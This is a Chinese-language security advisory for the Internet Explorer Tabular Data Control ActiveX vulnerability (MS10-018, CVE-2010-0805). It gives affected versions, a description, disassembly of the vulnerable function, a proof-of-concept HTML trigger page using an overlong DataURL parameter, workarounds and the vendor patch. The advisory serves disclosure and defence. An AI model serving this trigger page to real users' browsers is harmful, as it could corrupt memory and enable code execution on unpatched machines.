安全研究

安全漏洞
Microsoft IE Tabular Data Control ActiveX控件远程代码执行漏洞(MS10-018)

发布日期:2010-03-30
更新日期:2010-04-06

受影响系统:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4
描述:
BUGTRAQ  ID: 39025
CVE ID: CVE-2010-0805

Internet Explorer是Windows操作系统中默认捆绑的web浏览器。

Internet Explorer的Tabular Data Control ActiveX模块(tdc.ocx)中存在栈破坏漏洞。如果向CTDCCtl::SecurityCHeckDataURL函数传送了超长的DataURL参数,就可以触发这个漏洞,导致向任意内存位置写入单个NULL字节。

攻击者可以通过构建特制的网页来利用该漏洞,当用户查看网页时,该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与登录用户相同的用户权限。

<*来源:ZDI (http://www.zerodayinitiative.com/)
  
  链接:http://secunia.com/advisories/38860/
        http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA10-089A.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<!--  

.text:600058F7                 and     [ebp+pv], 0  

.text:600058FE                 lea     eax, [ebp+pv]  

.text:60005904                 push    eax             ; unsigned __int16 **  

.text:60005905                 push    dword ptr [ebx+10h] ; struct IOleClientSite *  

.text:60005908                 call    GetHostURL(IOleClientSite *,ushort * *)  

.text:6000590D                 mov     eax, [ebp+var_218]  

.text:60005913                 push    [ebp+pv]        ; pv  

.text:60005919                 mov     [ebp+eax+var_204], 0  

.text:60005921                 mov     eax, [ebp+var_21C]    ; length of the DataURL param  

.text:60005927                 mov     [ebp+eax+var_104], 0        ; write one byte to arbitrary stack address  

-->

<html>  

<title>Trigger for ZDI-10-034 by ZSploit.com</title>  

<head>  

</head>  

<body>  

<object classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">  

<param name="DataURL" value="http://zsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploi"/>  

</object>  

</body>  

</html>

建议:
临时解决方法:

* 在Office 2007中禁用ActiveX控件。
* 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。
* 将Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。
* 不要打开意外的文件。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS10-018)以及相应补丁:
MS10-018:Cumulative Security Update for Internet Explorer (980182)
链接:http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx?pf=true

浏览次数:4458
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障